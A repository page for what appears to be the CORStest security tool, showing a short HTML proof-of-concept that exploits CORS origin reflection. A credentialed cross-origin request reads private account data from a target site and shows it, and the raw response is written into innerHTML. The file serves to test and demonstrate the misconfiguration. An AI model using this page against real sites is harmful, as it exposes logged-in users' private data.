RYDE-WORK/CORStest
1
0
Fork 0
mirror of https://github.com/RYDE-WORK/CORStest.git synced 2026-01-19 21:23:20 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity
CORStest/tests/origin-reflection.html
jensvoid 65e0b3e421 Added exploitation tests
2017-07-07 13:03:16 +02:00

29 lines
972 B
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head><meta charset="UTF-8"></head>
<body>
<input id="host" type="text" size="30" value="https://cors-misconfigured-website">
<input id="path" type="text" size="50" value="/some-private-account-info">
<button onclick="corstest()">Leak it!</button>
<hr>
<textarea id="corsleak_text" rows="20" style="width:99%" readonly></textarea>
<hr>
<code id="corsleak_html"></code>
<script>
function corstest() {
document.getElementById('corsleak_text').value = "";
document.getElementById('corsleak_html').innerHTML = "";
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('GET', document.getElementById('host').value + document.getElementById('path').value);
req.withCredentials = true;
req.send();
function reqListener() {
document.getElementById('corsleak_text').value = this.responseText;
document.getElementById('corsleak_html').innerHTML = this.responseText;
}
}
</script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink